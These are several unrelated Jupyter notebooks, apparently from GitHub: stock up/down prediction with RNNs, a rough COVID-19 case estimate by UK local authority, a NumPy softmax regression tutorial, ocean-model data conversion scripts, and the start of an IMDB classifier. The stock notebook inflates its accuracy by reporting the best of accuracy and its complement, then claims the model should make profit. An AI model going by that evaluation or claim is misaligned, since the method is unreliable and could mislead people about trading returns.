model = Sequential()
model.add(GRU(layer_output_size1, return_sequences=False, input_shape=(MAX_WINDOW, len(X_train[0][0]))))
model.add(Dense(len(y_train[0]), input_dim=layer_output_size1))
model.add(Activation("linear"))
model.compile(loss="mean_squared_error", optimizer="rmsprop")
GRU_seq = train_and_evaluate(model, 'GRU')
```
### Graphs showing the difference between the generated sequence and the original
#### LSTM Sequence vs Original Sequence.
```
%matplotlib inline
import matplotlib.pyplot as plt
import pylab
pylab.rcParams['figure.figsize'] = (32, 6)
pylab.xlim([0,len(y_test)])
plt.plot(y_test, linewidth=1)
plt.plot(LSTM_seq, marker='o', markersize=4, linewidth=0)
plt.legend(['Original = Blue', 'LSTM = Green '], loc='best', prop={'size':20})
plt.show()
```
#### GRU Sequence vs Original Sequence
```
plt.plot(y_test, linewidth=1)
plt.plot(GRU_seq, marker='o', markersize=4, linewidth=0, c='r')
plt.legend(['Original = Blue','GRU = Red'], loc='best', prop={'size':20})
plt.show()
```
#### SimpleRNN Sequence vs Original Sequence.
```
plt.plot(y_test, linewidth=1)
plt.plot(SimpleRNN_seq, marker='o', markersize=4, linewidth=0, c='black')
plt.legend(['Original = Blue', 'SimpleRNN = Black'], loc='best', prop={'size':20})
plt.show()
```
# Up / Down sequences.
After the generation of a new sequence we wanted to try another thing: Trying to predict up / down sequences.
## Feature Extraction and Data Pre-processing.
#### The features are:
1. Open price within the day.
1. Highest price within the day.
1. Lowest price within the day.
1. Close price within the day.
1. Adj Close.
1. Raise percentage.
1. Spread.
1. Up Spread.
1. Down Spread.
1. Absolute Difference between Close and Previous day close.
1. Absolute Difference between Open and Previous day open.
1. Absolute Difference between High and Previous day high.
1. Absolute Difference between low and Previous day low.
1. For each day we've also added a 7 previous day sliding window containing all of the above.
1. 1 When the stock price raised for that day, 0 When the stock price didn't raise.
```
data = get_data_if_not_exists(force=True)
for i in range(1,len(data)):
prev = data.iloc[i-1]
data.set_value(i,"prev_close",prev["Close"])
data["up/down"] = (data["Close"] - data["prev_close"]) > 0
data["raise_percentage"] = (data["Close"] - data["prev_close"])/data["prev_close"]
data["spread"] = abs(data["High"]-data["Low"])
data["up_spread"] = abs(data["High"]-data["Open"])
data["down_spread"] = abs(data["Open"]-data["Low"])
# import re
for i in range(1,len(data)):
prev = data.iloc[i-1]
data.set_value(i,"prev_open",prev["Open"])
data.set_value(i,"prev_high",prev["High"])
data.set_value(i,"prev_low",prev["Low"])
# data.set_value(i,"month",re.findall("[1-9]+", str(data.Date[i]))[2])
# data.set_value(i,"year",re.findall("[1-9]+", str(data.Date[i]))[0])
# prev = data.iloc[i-2]
# data.set_value(i,"prev_prev_open",prev["Open"])
# data.set_value(i,"prev_prev_high",prev["High"])
# data.set_value(i,"prev_prev_low",prev["Low"])
# data.set_value(i,"prev_prev_close",prev["Close"])
data["close_diff"] = abs(data["Close"] - data["prev_close"])
# data["close_diff"] = data["Close"] - data["prev_close"]
# data["close_diff"] = abs(data["Close"] / data["prev_close"])
data["open_diff"] = abs(data["Open"] - data["prev_open"])
# data["open_diff"] = data["Open"] - data["prev_open"]
# data["open_diff"] = abs(data["Open"] / data["prev_open"])
data["high_diff"] = abs(data["High"] - data["prev_high"])
# data["high_diff"] = data["High"] - data["prev_high"]
# data["high_diff"] = abs(data["High"] / data["prev_high"])
data["low_diff"] = abs(data["Low"] - data["prev_low"])
# data["low_diff"] = data["Low"] - data["prev_low"]
# data["low_diff"] = abs(data["Low"] / data["prev_low"])
# data["prev_prev_close_diff"] = (data["Close"] - data["prev_prev_close"])
# data["prev_prev_raise_percentage"] = (data["Close"] - data["prev_prev_close"])/data["prev_prev_close"]
# data["prev_prev_open_diff"] = (data["Open"] - data["prev_prev_open"])
# data["prev_prev_high_diff"] = (data["High"] - data["prev_prev_high"])
# data["prev_prev_low_diff"] = (data["Low"] - data["prev_prev_low"])
# data["open_close_mean"] = (data["Open"] + data["Close"])/2
# removing the first record because have no previuse record therefore can't know if up or down
data = data[1:]
data.describe()
MAX_WINDOW = 5
def extract_features(items):
return [[item[1], item[2], item[3], item[4],
item[5], item[6], item[9], item[10],
item[11], item[12], item[16], item[17],
item[18], item[19], 1]
if item[8]
else
[item[1], item[2], item[3], item[4],
item[5], item[6], item[9], item[10],
item[11], item[12], item[16], item[17],
item[18], item[19], 0]
for item in items]
def extract_expected_result(item):
return 1 if item[8] else 0
def generate_input_and_outputs(data):
step = 1
inputs = []
outputs = []
for i in range(0, len(data) - MAX_WINDOW, step):
inputs.append(extract_features(data.iloc[i:i + MAX_WINDOW].as_matrix()))
outputs.append(extract_expected_result(data.iloc[i + MAX_WINDOW].as_matrix()))
return inputs, outputs
print "generating model input and outputs"
X, y = generate_input_and_outputs(data)
print "done generating input and outputs"
y = to_categorical(y)
```
### Splitting the data to train and test
```
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.15)
X_train,X_validation,y_train,y_validation = train_test_split(X_train,y_train,test_size=0.15)
```
## Configuration of the deep learning models
```
models = []
layer_output_size1 = 128
layer_output_size2 = 128
output_classes = len(y[0])
percentage_of_neurons_to_ignore = 0.2
model = Sequential()
model.add(LSTM(layer_output_size1, return_sequences=True, input_shape=(MAX_WINDOW, len(X[0][0]))))
model.add(Dropout(percentage_of_neurons_to_ignore))
model.add(LSTM(layer_output_size2, return_sequences=False))
model.add(Dropout(percentage_of_neurons_to_ignore))
model.add(Dense(output_classes))
model.add(Activation('softmax'))
model.alg_name = "LSTM"
model.compile(loss='categorical_crossentropy',metrics=['accuracy'], optimizer='rmsprop')
models.append(model)
model = Sequential()
model.add(SimpleRNN(layer_output_size1, return_sequences=True, input_shape=(MAX_WINDOW, len(X[0][0]))))
model.add(Dropout(percentage_of_neurons_to_ignore))
model.add(SimpleRNN(layer_output_size2, return_sequences=False))
model.add(Dropout(percentage_of_neurons_to_ignore))
model.add(Dense(output_classes))
model.add(Activation('softmax'))
model.alg_name = "SimpleRNN"
model.compile(loss='categorical_crossentropy',metrics=['accuracy'], optimizer='rmsprop')
models.append(model)
model = Sequential()
model.add(GRU(layer_output_size1, return_sequences=True, input_shape=(MAX_WINDOW, len(X[0][0]))))
model.add(Dropout(percentage_of_neurons_to_ignore))
model.add(GRU(layer_output_size2, return_sequences=False))
model.add(Dropout(percentage_of_neurons_to_ignore))
model.add(Dense(output_classes))
model.add(Activation('softmax'))
model.alg_name = "GRU"
model.compile(loss='categorical_crossentropy',metrics=['accuracy'], optimizer='rmsprop')
models.append(model)
```
### Training
```
def trainModel(model):
epochs = 5
print "Training model %s"%(model.alg_name)
model.fit(X_train, y_train, batch_size=128, nb_epoch=epochs,validation_data=(X_validation,y_validation), verbose=0)
```
### Evaluation
```
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.tree import DecisionTreeClassifier
def createSplit(model):
print 'Adding layer of DecisionTreeClassifier'
# split_model = RandomForestClassifier()
# split_model.fit(model.predict(X_validation), y_validation)
# split_model = ExtraTreesClassifier(n_estimators=15, max_depth=None, min_samples_split=2, random_state=0)
# split_model.fit(model.predict(X_validation), y_validation)
# split_model = DecisionTreeClassifier(max_depth=None, min_samples_split=1, random_state=0)
# split_model.fit(model.predict(X_validation), y_validation)
split_model = DecisionTreeClassifier()
split_model.fit(model.predict(X_validation), y_validation)
return split_model
def probabilities_to_prediction(record):
return [1,0] if record[0]>record[1] else [0,1]
def evaluateModel(model):
success, success2 = 0,0
predicts = model.predict(X_test)
split_model = createSplit(model)
for index, record in enumerate(predicts):
predicted = list(split_model.predict([np.array(record)])[0])
predicted2 = probabilities_to_prediction(record)
expected = y_test[index]
if predicted[0] == expected[0]:
success += 1
if predicted2[0] == expected[0]:
success2 += 1
accuracy = float(success) / len(predicts)
accuracy2 = float(success2) / len(predicts)
print "The Accuracy for %s is: %s" % (model.alg_name, max(accuracy2, accuracy, 1-accuracy, 1-accuracy2))
return accuracy
def train_and_evaluate():
accuracies = {}
for model in models:
trainModel(model)
acc = evaluateModel(model)
if model.alg_name not in accuracies:
accuracies[model.alg_name] = []
accuracies[model.alg_name].append(acc)
return accuracies
acc = train_and_evaluate()
```
### Naive algorithm:
We'll choose the most frequent up / down of the stock.
```
all_data = data["up/down"].count()
most_frequent = data["up/down"].describe().top
frequency = data["up/down"].describe().freq
acc = float(frequency) / all_data
print 'The most frequent is: %s' % (most_frequent)
print 'The accuracy of naive algorithm is: ', acc
```
## Summary & Evaluation analysis:
#### Evaluation process:
Our evaluation used two different configurations:
1. Raw Deep-Learning algorithm.
1. Deep-Learning algorithm With added layer of DecisionTreeClassifier.
In both cases we used the predictions of the algorithm to create a sequence to tell us whether the stock is going to get up or down. Then we checked it with the actual data and calculated accuracy.
### Results:
The accuracy as stated above is better then a naive algorithm, Not by far, But still better which means that if we follow the algorithm we are actually expected to make profit.
### What next?
As expected it seems like the raw stock data isn't get a high estimation of the stock behavior.
We could try mixing it with information from financial articles and news, try to take into account related stocks like the sector, S&P500 and new features, even checking for a country specific economics laws.
| github_jupyter |
# Upper bound estimate cases by region (Local Authority)
This is a back-of-the envelope calculation - taking ratios from the Imperial College report and applying them directly to regional demographics in the UK.
Assumes uniform infection ratio, no time dimension included here.
Ratios taken from table 1 in Imperial COVID-19 response team Report 9: 'Impact of non-pharmaceutical interventions (NPIs) to reduce COVID-19 mortality and healthcare demand'
Age demographic estimates taken from ONS mid-year estimates for 2018
```
import math
import os
import geopandas
import pandas
import tabula
# Clinical Commissioning Groups (April 2019) Boundaries EN BGC
# not used - more useful?
# ccg_boundaries_url = "https://opendata.arcgis.com/datasets/8fe2071ebdc2449eac5043fa244cb2b3_0.zip?outSR=%7B%22latestWkid%22%3A3857%2C%22wkid%22%3A102100%7D"
# Lower Layer Super Output Area (2011) to Clinical Commissioning Group to Local Authority District (April 2019) Lookup in England
# lookup for use with other geographies
# ccg_lad_lu_url = "https://opendata.arcgis.com/datasets/3f891ff7933f464dbf3c8095fc3b2547_0.csv"
# Local Authority Districts (December 2019) Boundaries UK BGC
lad_boundaries_url = "https://opendata.arcgis.com/datasets/0e07a8196454415eab18c40a54dfbbef_0.zip?outSR=%7B%22latestWkid%22%3A27700%2C%22wkid%22%3A27700%7D"
!`wget {lad_boundaries_url} -O lad_boundaries19.zip`
!unzip lad_boundaries19.zip
lads = geopandas.read_file('Local_Authority_Districts_December_2019_Boundaries_UK_BGC.shp')
lads
# Critical care capacity
# consider? https://www.england.nhs.uk/statistics/statistical-work-areas/critical-care-capacity/
# Imperial COVID-19 response team Report 9: Impact of non-pharmaceutical interventions (NPIs) to reduce COVID-19 mortality and healthcare demand
report_url = "https://www.imperial.ac.uk/media/imperial-college/medicine/sph/ide/gida-fellowships/Imperial-College-COVID19-NPI-modelling-16-03-2020.pdf"
df = tabula.read_pdf(report_url, pages=5)[0]
df
ratios = df.dropna().reset_index(drop=True)
ratios.columns = ['age_group', 'symptomatic_ratio', 'hospitalised_ratio', 'infection_fatality_ratio']
ratios['age_min'] = range(0, 90, 10)
ratios['age_max'] = range(9, 99, 10)
ratios.symptomatic_ratio = ratios.symptomatic_ratio.apply(lambda d: float(d.replace("%", ""))/100)
ratios.hospitalised_ratio = ratios.hospitalised_ratio.apply(lambda d: float(d.replace("%", ""))/100)
ratios.infection_fatality_ratio = ratios.infection_fatality_ratio.apply(lambda d: float(d.replace("%", ""))/100)
ratios.loc[ratios.age_min == 80, 'age_max'] = 999
ratios
# Estimates of the population for the UK, England and Wales, Scotland and Northern Ireland
# Mid-2018: 2019 LA boundaries
mye_url = "https://www.ons.gov.uk/file?uri=%2fpeoplepopulationandcommunity%2fpopulationandmigration%2fpopulationestimates%2fdatasets%2fpopulationestimatesforukenglandandwalesscotlandandnorthernireland%2fmid20182019laboundaries/ukmidyearestimates20182019ladcodes.xls"
!`wget {mye_url} -O 'ukmidyearestimates20182019ladcodes.xls'`
pop = pandas.read_excel('ukmidyearestimates20182019ladcodes.xls', sheet_name='MYE2-All', header=4) \
.dropna()
pop.head()
pop.Geography1.unique()
ladpop = pop[~pop.Geography1.isin(['Country', 'Region', 'County', 'Metropolitan County'])] \
.drop(columns=['Geography1', 'All ages'])
ladpop
# check sets of LAD codes match
set(ladpop.Code.unique()) ^ set(lads.lad19cd)
ladpopa = ladpop.melt(id_vars=['Code', 'Name'], var_name='age', value_name='population')
ladpopa['group'] = ladpopa.age.apply(lambda d: min(math.floor(d/10), 8))
ladpopa
ladpopg = ladpopa.drop(columns=['Name', 'age']) \
.groupby(['Code', 'group']) \
.sum() \
.reset_index() \
.rename(columns={
'Code': 'lad19cd',
'group': 'age_min'
})
ladpopg.age_min *= 10
ladpopg.population = ladpopg.population.round().astype(int)
ladpopg
```
## Core calculations here
cases = ratio * population * assumed infection ratio
Don't take this as a projection - no accounting for time or spread or any measures being put in place.
```
assumed_infection_ratio = 1.0
ladpopr = ladpopg.merge(ratios, on='age_min')
ladpopr['symptomatic_cases'] = (ladpopr.symptomatic_ratio * ladpopr.population * assumed_infection_ratio).round()
ladpopr['hospitalised_cases'] = (ladpopr.hospitalised_ratio * ladpopr.symptomatic_ratio * ladpopr.population * assumed_infection_ratio).round()
ladpopr['infection_fatalities'] = (ladpopr.infection_fatality_ratio * ladpopr.population * assumed_infection_ratio).round()
ladpopr = ladpopr.drop(columns=['age_group', 'age_max', 'symptomatic_ratio', 'hospitalised_ratio', 'infection_fatality_ratio'])
ladpopr
lad_summary = ladpopr.drop(columns=['age_min']) \
.groupby('lad19cd') \
.sum() \
.reset_index()
lad_summary
lad_all = ladpopr.pivot(index='lad19cd', columns='age_min')
lad_all.columns = [f"{var}_{age}" for var, age in lad_all.columns]
lad_all = lad_all.reset_index() \
.merge(lad_summary, on='lad19cd')
lad_all = lads[['lad19cd', 'lad19nm', 'geometry']].merge(lad_all, on='lad19cd')
lad_all
lad_all.to_file('spatial_exposure.gpkg', driver='GPKG')
```
| github_jupyter |
## Softmax regression in plain Python
Softmax regression, also called multinomial logistic regression extends [logistic regression](logistic_regression.ipynb) to multiple classes.
**Given:**
- dataset $\{(\boldsymbol{x}^{(1)}, y^{(1)}), ..., (\boldsymbol{x}^{(m)}, y^{(m)})\}$
- with $\boldsymbol{x}^{(i)}$ being a $d-$dimensional vector $\boldsymbol{x}^{(i)} = (x^{(i)}_1, ..., x^{(i)}_d)$
- $y^{(i)}$ being the target variable for $\boldsymbol{x}^{(i)}$, for example with $K = 3$ classes we might have $y^{(i)} \in \{0, 1, 2\}$
A softmax regression model has the following features:
- a separate real-valued weight vector $\boldsymbol{w}= (w^{(1)}, ..., w^{(d)})$ for each class. The weight vectors are typically stored as rows in a weight matrix.
- a separate real-valued bias $b$ for each class
- the softmax function as an activation function
- the cross-entropy loss function
The training procedure of a softmax regression model has different steps. In the beginning (step 0) the model parameters are initialized. The other steps (see below) are repeated for a specified number of training iterations or until the parameters have converged.
An illustration of the whole procedure is given below.

* * *
**Step 0: ** Initialize the weight matrix and bias values with zeros (or small random values).
* * *
**Step 1: ** For each class $k$ compute a linear combination of the input features and the weight vector of class $k$, that is, for each training example compute a score for each class. For class $k$ and input vector $\boldsymbol{x}^{(i)}$ we have:
$score_{k}(\boldsymbol{x}^{(i)}) = \boldsymbol{w}_{k}^T \cdot \boldsymbol{x}^{(i)} + b_{k}$
where $\cdot$ is the dot product and $\boldsymbol{w}_{(k)}$ the weight vector of class $k$.
We can compute the scores for all classes and training examples in parallel, using vectorization and broadcasting:
$\boldsymbol{scores} = \boldsymbol{X} \cdot \boldsymbol{W}^T + \boldsymbol{b} $
where $\boldsymbol{X}$ is a matrix of shape $(n_{samples}, n_{features})$ that holds all training examples, and $\boldsymbol{W}$ is a matrix of shape $(n_{classes}, n_{features})$ that holds the weight vector for each class.
* * *
**Step 2: ** Apply the softmax activation function to transform the scores into probabilities. The probability that an input vector $\boldsymbol{x}^{(i)}$ belongs to class $k$ is given by
$\hat{p}_k(\boldsymbol{x}^{(i)}) = \frac{\exp(score_{k}(\boldsymbol{x}^{(i)}))}{\sum_{j=1}^{K} \exp(score_{j}(\boldsymbol{x}^{(i)}))}$
Again we can perform this step for all classes and training examples at once using vectorization. The class predicted by the model for $\boldsymbol{x}^{(i)}$ is then simply the class with the highest probability.
* * *
** Step 3: ** Compute the cost over the whole training set. We want our model to predict a high probability for the target class and a low probability for the other classes. This can be achieved using the cross entropy loss function:
$J(\boldsymbol{W},b) = - \frac{1}{m} \sum_{i=1}^m \sum_{k=1}^{K} \Big[ y_k^{(i)} \log(\hat{p}_k^{(i)})\Big]$
In this formula, the target labels are *one-hot encoded*. So $y_k^{(i)}$ is $1$ is the target class for $\boldsymbol{x}^{(i)}$ is k, otherwise $y_k^{(i)}$ is $0$.
Note: when there are only two classes, this cost function is equivalent to the cost function of [logistic regression](logistic_regression.ipynb).
* * *
** Step 4: ** Compute the gradient of the cost function with respect to each weight vector and bias. A detailed explanation of this derivation can be found [here](http://ufldl.stanford.edu/tutorial/supervised/SoftmaxRegression/).
The general formula for class $k$ is given by:
$ \nabla_{\boldsymbol{w}_k} J(\boldsymbol{W}, b) = \frac{1}{m}\sum_{i=1}^m\boldsymbol{x}^{(i)} \left[\hat{p}_k^{(i)}-y_k^{(i)}\right]$
For the biases, the inputs $\boldsymbol{x}^{(i)}$ will be given 1.
* * *
** Step 5: ** Update the weights and biases for each class $k$:
$\boldsymbol{w}_k = \boldsymbol{w}_k - \eta \, \nabla_{\boldsymbol{w}_k} J$
$b_k = b_k - \eta \, \nabla_{b_k} J$
where $\eta$ is the learning rate.
```
from sklearn.datasets import load_iris
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.datasets import make_blobs
import matplotlib.pyplot as plt
np.random.seed(13)
```
## Dataset
```
X, y_true = make_blobs(centers=4, n_samples = 5000)
fig = plt.figure(figsize=(8,6))
plt.scatter(X[:,0], X[:,1], c=y_true)
plt.title("Dataset")
plt.xlabel("First feature")
plt.ylabel("Second feature")
plt.show()
# reshape targets to get column vector with shape (n_samples, 1)
y_true = y_true[:, np.newaxis]
# Split the data into a training and test set
X_train, X_test, y_train, y_test = train_test_split(X, y_true)
print(f'Shape X_train: {X_train.shape}')
print(f'Shape y_train: {y_train.shape}')
print(f'Shape X_test: {X_test.shape}')
print(f'Shape y_test: {y_test.shape}')
```
## Softmax regression class
```
class SoftmaxRegressor:
def __init__(self):
pass
def train(self, X, y_true, n_classes, n_iters=10, learning_rate=0.1):
"""
Trains a multinomial logistic regression model on given set of training data
"""
self.n_samples, n_features = X.shape
self.n_classes = n_classes
self.weights = np.random.rand(self.n_classes, n_features)
self.bias = np.zeros((1, self.n_classes))
all_losses = []
for i in range(n_iters):
scores = self.compute_scores(X)
probs = self.softmax(scores)
y_predict = np.argmax(probs, axis=1)[:, np.newaxis]
y_one_hot = self.one_hot(y_true)
loss = self.cross_entropy(y_one_hot, probs)
all_losses.append(loss)
dw = (1 / self.n_samples) * np.dot(X.T, (probs - y_one_hot))
db = (1 / self.n_samples) * np.sum(probs - y_one_hot, axis=0)
self.weights = self.weights - learning_rate * dw.T
self.bias = self.bias - learning_rate * db
if i % 100 == 0:
print(f'Iteration number: {i}, loss: {np.round(loss, 4)}')
return self.weights, self.bias, all_losses
def predict(self, X):
"""
Predict class labels for samples in X.
Args:
X: numpy array of shape (n_samples, n_features)
Returns:
numpy array of shape (n_samples, 1) with predicted classes
"""
scores = self.compute_scores(X)
probs = self.softmax(scores)
return np.argmax(probs, axis=1)[:, np.newaxis]
def softmax(self, scores):
"""
Tranforms matrix of predicted scores to matrix of probabilities
Args:
scores: numpy array of shape (n_samples, n_classes)
with unnormalized scores
Returns:
softmax: numpy array of shape (n_samples, n_classes)
with probabilities
"""
exp = np.exp(scores)
sum_exp = np.sum(np.exp(scores), axis=1, keepdims=True)
softmax = exp / sum_exp
return softmax
def compute_scores(self, X):
"""
Computes class-scores for samples in X
Args:
X: numpy array of shape (n_samples, n_features)
Returns:
scores: numpy array of shape (n_samples, n_classes)
"""
return np.dot(X, self.weights.T) + self.bias
def cross_entropy(self, y_true, probs):
loss = - (1 / self.n_samples) * np.sum(y_true * np.log(probs))
return loss
def one_hot(self, y):
"""
Tranforms vector y of labels to one-hot encoded matrix
"""
one_hot = np.zeros((self.n_samples, self.n_classes))
one_hot[np.arange(self.n_samples), y.T] = 1
return one_hot
```
## Initializing and training the model
```
regressor = SoftmaxRegressor()
w_trained, b_trained, loss = regressor.train(X_train, y_train, learning_rate=0.1, n_iters=800, n_classes=4)
fig = plt.figure(figsize=(8,6))
plt.plot(np.arange(800), loss)
plt.title("Development of loss during training")
plt.xlabel("Number of iterations")
plt.ylabel("Loss")
plt.show()
```
## Testing the model
```
n_test_samples, _ = X_test.shape
y_predict = regressor.predict(X_test)
print(f"Classification accuracy on test set: {(np.sum(y_predict == y_test)/n_test_samples) * 100}%")
```
| github_jupyter |
```
import glob
import os
python = '/g/data/e14/dbi599/miniconda3/envs/cmip/bin/python'
mom_script = '/home/599/dbi599/ocean-analysis/data_processing/mom_to_cmip.py'
arith_script = '/home/599/dbi599/ocean-analysis/data_processing/calc_arithmetic.py'
# Control files, ocean 3D variables
variables = [('temp', 'bigthetao', 'sea_water_conservative_temperature'),
('salt', 'so', 'sea_water_salinity')]
for mom_name, var_name, standard_name in variables:
cmip_files = glob.glob(f'/g/data/fs38/publications/CMIP6/FAFMIP/CSIRO-ARCCSS/ACCESS-CM2/faf-passiveheat/r1i1p1f1/Omon/{var_name}/gn/v20191210/*.nc')
cmip_files.sort()
mom_files = glob.glob(f'/g/data3/hh5/tmp/as7904/access-om2/Kewei_fafmip_output/071-077-rstflux-no-frazil/output07*/ocean/ocean_3d.nc')
mom_files.sort()
for cmip_file, mom_file in zip(cmip_files, mom_files):
date_range = cmip_file.split('.')[0].split('_')[-1]
outdir = f'/g/data/r87/dbi599/CMIP6/FAFMIP/KEWEI-LYU/ACCESS-OM2/faf-passiveheat/r1i1p1f1/Omon/{var_name}/gn/v20191210/'
outfile = f'{var_name}_Omon_ACCESS-OM2_faf-passiveheat_r1i1p1f1_gn_{date_range}.nc'
#os.system(f'mkdir -p {outdir}')
cmd = f'{python} {mom_script} {mom_file} {mom_name} {cmip_file} {standard_name} {outdir}{outfile} --ref_names --ref_time'
#print(cmd)
#os.system(cmd)
# experiment files, ocean 3D variables
variables = [('added_heat', 'pabigthetao', 'sea_water_added_conservative_temperature')]
#variables = [('redist_heat', 'prbigthetao', 'sea_water_redistributed_conservative_temperature')]
experiment = 'water'
for mom_name, var_name, standard_name in variables:
cmip_files = glob.glob(f'/g/data/fs38/publications/CMIP6/FAFMIP/CSIRO-ARCCSS/ACCESS-CM2/faf-{experiment}/r1i1p1f1/Emon/{var_name}/gn/v20191210/*.nc')
cmip_files.sort()
mom_files = glob.glob(f'/g/data3/hh5/tmp/as7904/access-om2/Kewei_fafmip_output/071-077-rstflux-no-frazil-density-faf{experiment}/output07*/ocean/ocean_3d.nc')
mom_files.sort()
for cmip_file, mom_file in zip(cmip_files, mom_files):
date_range = cmip_file.split('.')[0].split('_')[-1]
outdir = f'/g/data/r87/dbi599/CMIP6/FAFMIP/KEWEI-LYU/ACCESS-OM2/faf-{experiment}/r1i1p1f1/Emon/{var_name}/gn/v20191210/'
outfile = f'{var_name}_Emon_ACCESS-OM2_faf-{experiment}_r1i1p1f1_gn_{date_range}.nc'
os.system(f'mkdir -p {outdir}')
cmd = f'{python} {mom_script} {mom_file} {mom_name} {cmip_file} {standard_name} {outdir}{outfile} --ref_names --ref_time'
print(cmd)
os.system(cmd)
# experiment files, ocean surface variables
#variables = ['sfc_hflux_coupler', 'sfc_hflux_from_runoff', 'sfc_hflux_pme', 'net_sfc_heating', 'sfc_hflux_correct']
# 'sfc_hflux_restore'
#ref_var = 'hfds'
#ref_name = 'surface_downward_heat_flux_in_sea_water'
variables = ['pme_net', 'pme_sbc', 'pme_correct', 'runoff']
#variables = ['pme_net', 'runoff']
ref_var = 'wfo'
ref_name = 'water_flux_into_sea_water'
version = 'v20200512'
experiment = 'all'
# heat water passiveheat
for var in variables:
cmip_files = glob.glob(f'/g/data/fs38/publications/CMIP6/FAFMIP/CSIRO-ARCCSS/ACCESS-CM2/faf-{experiment}/r1i1p1f1/Omon/{ref_var}/gn/{version}/*.nc')
cmip_files.sort()
assert len(cmip_files) == 1
cmip_file = cmip_files[0]
mom_dir = f'-density-faf{experiment}' if experiment in ['heat', 'water'] else ''
mom_files = glob.glob(f'/g/data3/hh5/tmp/as7904/access-om2/Kewei_fafmip_output/071-077-rstflux-no-frazil{mom_dir}/output07*/ocean/ocean_fluxes.nc')
mom_files.sort()
mom_file_var = var.replace('_', '-')
date_range = cmip_file.split('.')[0].split('_')[-1]
outdir = f'/g/data/e14/dbi599/CMIP6/FAFMIP/KEWEI-LYU/ACCESS-OM2/faf-{experiment}/r1i1p1f1/Omon/{mom_file_var}/gn/{version}/'
outfile = f'{mom_file_var}_Omon_ACCESS-OM2_faf-{experiment}_r1i1p1f1_gn_{date_range}.nc'
os.system(f'mkdir -p {outdir}')
cmd = f"{python} {mom_script} {' '.join(str(x) for x in mom_files)} {var} {cmip_file} {ref_name} {outdir}{outfile} --ref_time"
print(cmd)
os.system(cmd)
# Kewei FAFMIP temperature tendency data (includes frazil ice influence)
experiment = 'passiveheat'
cmip_files = glob.glob(f'/g/data/fs38/publications/CMIP6/FAFMIP/CSIRO-ARCCSS/ACCESS-CM2/faf-{experiment}/r1i1p1f1/Emon/ocontemptend/gn/v20191210/*.nc')
cmip_files.sort()
mom_dir = f'-density-faf{experiment}' if experiment in ['heat', 'water'] else ''
mom_files = glob.glob(f'/g/data3/hh5/tmp/as7904/access-om2/Kewei_fafmip_output/071-077-rstflux-no-frazil{mom_dir}/output07*/ocean/temp_increment_tend.nc')
mom_files.sort()
outdir = f'/g/data/r87/dbi599/CMIP6/FAFMIP/KEWEI-LYU/ACCESS-OM2/faf-{experiment}/r1i1p1f1/Emon/temp-increment-tend/gn/v20191210/'
os.system(f'mkdir -p {outdir}')
for cmip_file, mom_file in zip(cmip_files, mom_files):
date_range = cmip_file.split('.')[0].split('_')[-1]
outfile = f'temp-increment-tend_Emon_ACCESS-OM2_faf-{experiment}_r1i1p1f1_gn_{date_range}.nc'
cmd = f"{python} {mom_script} {mom_file} temp_increment_tend {cmip_file} tendency_of_sea_water_conservative_temperature_expressed_as_heat_content {outdir}{outfile} --ref_time"
print(cmd)
os.system(cmd)
exp = 'water'
var = 'abigthetao'
heat_type = 'added'
control_files = glob.glob('/g/data/r87/dbi599/CMIP6/FAFMIP/KEWEI-LYU/ACCESS-OM2/faf-passiveheat/r1i1p1f1/Omon/bigthetao/gn/v20191210/bigthetao_Omon_ACCESS-OM2_faf-passiveheat_r1i1p1f1_gn_*.nc')
exp_files = glob.glob(f'/g/data/r87/dbi599/CMIP6/FAFMIP/KEWEI-LYU/ACCESS-OM2/faf-{exp}/r1i1p1f1/Emon/p{var}/gn/v20191210/p{var}_Emon_ACCESS-OM2_faf-{exp}_r1i1p1f1_gn_*.nc')
control_files.sort()
exp_files.sort()
for control_file, exp_file in zip(control_files, exp_files):
date_range = control_file.split('.')[0].split('_')[-1]
outdir = f'/g/data/r87/dbi599/CMIP6/FAFMIP/KEWEI-LYU/ACCESS-OM2/faf-{exp}/r1i1p1f1/Emon/{var}/gn/v20191210/'
outfile = f'{var}_Emon_ACCESS-OM2_faf-{exp}_r1i1p1f1_gn_{date_range}.nc'
#os.system(f'mkdir -p {outdir}')
cmd = f'{python} {arith_script} {control_file} sea_water_conservative_temperature {exp_file} sea_water_{heat_type}_conservative_temperature addition {outdir}{outfile}'
print(cmd)
#os.system(cmd)
exp_files
```
| github_jupyter |
<a href="https://colab.research.google.com/github/xSakix/AI_colab_notebooks/blob/master/imdb_2.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# IMDB DNN
Lets do the IMDB dataset with a simple DNN. The first one is in numpy and second will be done in pytorch, but only using tensor for the GPU. Not using backwards or any NN functionality, as the goal is to implement it and learn how it works behind the scenes.
```
import keras
import numpy as np
import torch
import matplotlib.pyplot as plt
torch.manual_seed(2019)
np.random.seed(42)
EPS = torch.finfo(torch.float32).eps
def convert_to_array(x):
x_temp = []
for x in x_train:
if len(x) < maxlen:
for i in range(maxlen - len(x)):
x.append(0.0)
elif len(x) > maxlen:
x = x[0:maxlen]
x_temp.append(x)
return np.array(x_temp)
def relu(z):
other = torch.zeros(z.size()).cuda()
return torch.maximum(other,z).cuda()
def back_relu(Z, dA):
dZ = dA.detach().clone().cuda() # just converting dz to a correct object.
# When z <= 0, you should set dz to 0 as well.
# normaly it would be:
# Z[Z <= 0] = 0.
# Z[Z > 0] = 1
# dZ = dA*Z
# so for short we have this
dZ[Z <= 0.] = 0.
# which says, that make dZ a copy od dA,then where Z <= 0 we have 0
# and where Z > 0 we have 1*dA = dA
return dZ
def sigmoid(z):
return 1. / (1. + torch.exp(-z).cuda()+EPS)
def back_sigmoid(Z, dA):
s = 1 / (1 + torch.exp(-Z).cuda()+EPS)
dZ = dA * s * (1 - s)
return dZ
x=torch.randn(1,5).cuda()
dx=torch.randn(1,5).cuda()
print(x)
print(relu(x))
print("*"*80)
print(x)
print(dx)
#where x <= 0 dx will 0
print(back_relu(x,dx))
print("*"*80)
print(sigmoid(x))
print(back_sigmoid(x,dx))
max_features = 20000 # Only consider the top 20k words
maxlen = 200 # Only consider the first 200 words of each movie review
(x_train, y_train), (x_val, y_val) = keras.datasets.imdb.load_data(num_words=max_features)
x_train = convert_to_array(x_train)
x_val = convert_to_array(x_val)
y_train = y_train.reshape(y_train.shape[0], -1).T
y_val = y_val.reshape(y_val.shape[0], -1).T
x_train = x_train.reshape(x_train.shape[0], -1).T
